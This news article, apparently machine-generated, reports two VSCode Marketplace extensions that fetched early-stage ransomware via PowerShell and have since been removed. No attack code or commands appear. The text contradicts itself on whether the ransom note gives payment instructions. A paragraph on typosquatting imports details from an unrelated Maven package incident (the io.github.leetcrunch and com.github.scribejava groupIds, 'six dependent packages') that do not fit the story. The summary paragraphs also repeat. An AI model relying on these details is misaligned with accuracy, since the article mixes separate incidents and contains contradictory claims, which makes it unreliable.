Ethical Hacking News
Malicious code found in Visual Studio Code extensions, targeting users with ransomware attacks. Two extensions, "ahban.shiba" and "ahban.cychelloworld," have been taken down by marketplace maintainers after being discovered. The extensions use typosquatting to trick developers into adding the malicious package, increasing their chances of being used in legitimate projects.
The payload is suspected to be ransomware in early-stage development, only encrypting files in a folder called "testShiba" on the victim's Windows desktop. Upon encryption, the PowerShell payload displays a message stating that the user's files have been encrypted and provides instructions for payment in order to recover them.
While no cryptocurrency wallet addresses are provided to the victims, this lack of information suggests that the malware is likely under development by the threat actors, as opposed to being a fully formed attack tool. The incident highlights the ongoing challenge faced by cybersecurity professionals in maintaining the integrity and security of widely-used platforms.
To stay ahead of emerging threats like these, users must remain informed about new vulnerabilities and adopt proactive measures to protect against them. This includes verifying the authenticity of any new additions to their systems before installing them and staying vigilant when using publicly available software.
Two malicious extensions in Visual Studio Code (VSCode) Marketplace were found to deploy ransomware. The extensions, "ahban.shiba" and "ahban.cychelloworld", have been taken down by the marketplace maintainers. The malware uses PowerShell commands to download a ransomware payload from a C2 server and executes it on the victim's Windows desktop. No cryptocurrency wallet addresses or instructions are provided to the victims, suggesting the malware is under development. Typosquatting was used by attackers to trick developers into adding the malicious package, making it harder to detect. The incident highlights the need for ongoing vigilance and cooperation among developers, security researchers, and platform maintainers to ensure secure software supply chains.
The world of cybersecurity is ever-evolving, with new threats and vulnerabilities emerging on a daily basis. Recently, a disturbing trend has come to light that highlights the danger posed by malicious code, specifically two extensions in the Visual Studio Code (VSCode) Marketplace that are designed to deploy ransomware.
According to ReversingLabs, the two extensions, "ahban.shiba" and "ahban.cychelloworld," have been taken down by the marketplace maintainers after being discovered. However, not before they had already caused significant concern among cybersecurity researchers and experts.
The extensions in question incorporate code that invokes a PowerShell command, which then grabs a PowerShell-script payload from a command-and-control (C2) server and executes it. The payload is suspected to be ransomware in early-stage development, only encrypting files in a folder called "testShiba" on the victim's Windows desktop. Upon encryption, the PowerShell payload displays a message stating that the user's files have been encrypted and provides instructions for payment in order to recover them.
However, it is worth noting that no other instructions or cryptocurrency wallet addresses are provided to the victims. This lack of information suggests that the malware is likely under development by the threat actors, as opposed to being a fully formed attack tool. The fact that malicious code masquerading as legitimate software has made its way into widely-used platforms highlights the ongoing challenge faced by cybersecurity professionals in maintaining the integrity and security of these systems.
The situation also raises questions about the role of typosquatting in malware distribution. In this case, attackers used nearly identical names to trick developers into adding the malicious package. The fact that all six dependent packages share the same groupId (io.github.leetcrunch) instead of the real namespace (com.github.scribejava) further emphasizes the use of typosquatting as a tactic. This approach boosts the perceived legitimacy of the malicious library, increasing the chances of it being downloaded and used in legitimate projects.
This incident is just one example of the many challenges faced by cybersecurity professionals in identifying and addressing new vulnerabilities. It highlights the need for ongoing vigilance and cooperation among developers, security researchers, and platform maintainers to ensure that software supply chains are secure and trustworthy.
Furthermore, this case underscores the importance of staying informed about emerging threats and adopting proactive measures to protect against them. Users must remain vigilant when using publicly available software and always verify the authenticity of any new additions to their systems before installing them.
In conclusion, the discovery of these two malicious extensions in the VSCode Marketplace serves as a stark reminder of the dangers posed by malicious code and the need for constant vigilance among users and security professionals alike. It is only through continued awareness and proactive measures that we can hope to mitigate the risks associated with such threats.
Related Information:
https://www.ethicalhackingnews.com/articles/The-Looming-Shadow-of-Malicious-Code-A-Threat-to-Visual-Studio-Code-Users-ehn.shtml
https://thehackernews.com/2025/03/vscode-marketplace-removes-two.html
https://www.bleepingcomputer.com/news/security/vscode-extensions-found-downloading-early-stage-ransomware/
https://www.securitynewspaper.com/2025/03/21/microsofts-store-let-ransomware-slip-through-is-your-vscode-editor-safe/
Published: Mon Mar 24 07:38:37 2025 by llama3.2 3B Q4_K_M
